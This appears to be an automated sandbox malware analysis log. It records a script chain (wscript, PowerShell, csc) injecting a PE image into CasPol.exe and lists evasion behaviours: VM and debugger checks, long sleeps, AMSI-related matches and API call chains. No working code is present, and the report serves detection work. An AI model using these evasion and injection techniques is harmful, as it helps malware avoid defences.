                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0040E54F Sleep,ExitProcess,11_2_0040E54F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,11_2_004198D2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7002Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2572Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4133Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5589Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 814Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9169Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 9.0 %
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep count: 7002 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4868Thread sleep count: 2572 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1976Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 716Thread sleep count: 814 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 716Thread sleep time: -2442000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 716Thread sleep count: 9169 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 716Thread sleep time: -27507000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,11_2_0041B43F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044D5F9 FindFirstFileExA,11_2_0044D5F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,11_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00406AC2 FindFirstFileW,FindNextFileW,11_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,11_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00418C79
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,11_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00406F06
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000008.00000002.2465755195.0000000007421000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
                    Source: powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.2205005983.00000000070FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
                    Source: powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: wscript.exe, 00000007.00000002.2187737206.0000000004DEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
                    Source: powershell.exe, 00000003.00000002.2201548763.0000000002D0D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2206466592.000000000801E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2206861325.000000000809F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.2205005983.00000000070FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
                    Source: powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: wscript.exe, 00000007.00000002.2187737206.0000000004DEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Z3
                    Source: CasPol.exe, 0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_11-47547
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0043A66D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041BCF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00442564 mov eax, dword ptr fs:[00000030h]11_2_00442564
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044E93E GetProcessHeap,11_2_0044E93E
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00434178
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0043A66D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00433B54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00433CE7 SetUnhandledExceptionFilter,11_2_00433CE7

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: amsi32_2704.amsi.csv, type: OTHER
                    Source: Yara matchFile source: amsi32_2704.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: EC9008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe11_2_00410F36
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00418764 mouse_event,11_2_00418764
